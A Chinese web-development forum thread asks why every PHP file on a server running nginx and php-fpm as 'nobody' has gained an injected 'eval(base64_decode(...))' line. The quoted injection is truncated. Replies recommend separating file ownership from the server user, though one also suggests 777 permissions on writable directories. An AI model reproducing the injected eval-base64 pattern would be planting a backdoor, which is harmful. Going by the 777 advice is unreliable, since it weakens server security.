nginx php-fpm权限问题

发布于 2021-11-24 15:46:59 字数 276 浏览 743 评论 4

nginx运行用户:nobody

php-fpm运行用户:nobody

web目录:chown -R nobody /usr/share/nginx/html/*

全是是上面那样设置的,现在发先web下的所有*.php的<?php后面被加了

eval(base64_decode("CmVycm9yX3JlcG9此处省略
求科普和解决方法

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。

评论(4

挽清梦 2021-11-24 16:54:05

Web服务器运行用户和Web目录所有者不同是最基本的安全原则,要不就会像在Windows开发那样,PHP脚本可以对Web目录甚至Windows系统目录内容进行修改,完全没有安全性可言。

PHP-FPM运行用户可以也建议跟Nginx用户相同。

彩扇题诗 2021-11-24 16:49:51

你这回复和楼上有区别么?

泛泛之交 2021-11-24 16:35:58

回复
求指导!

鹤舞 2021-11-24 15:56:39

楼上的回复,跟没说一样。

你这个文件目录权限安全机制简直是形同虚设,

你这样一来,php可对网站目录中所有文件具有可写权限,当然就不安全了。建议点:

php-fpm以nobody运行

网站文件所有者设置为其它帐号。

针对需要可写的目录,设置777权限

~没有更多了~
我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
原文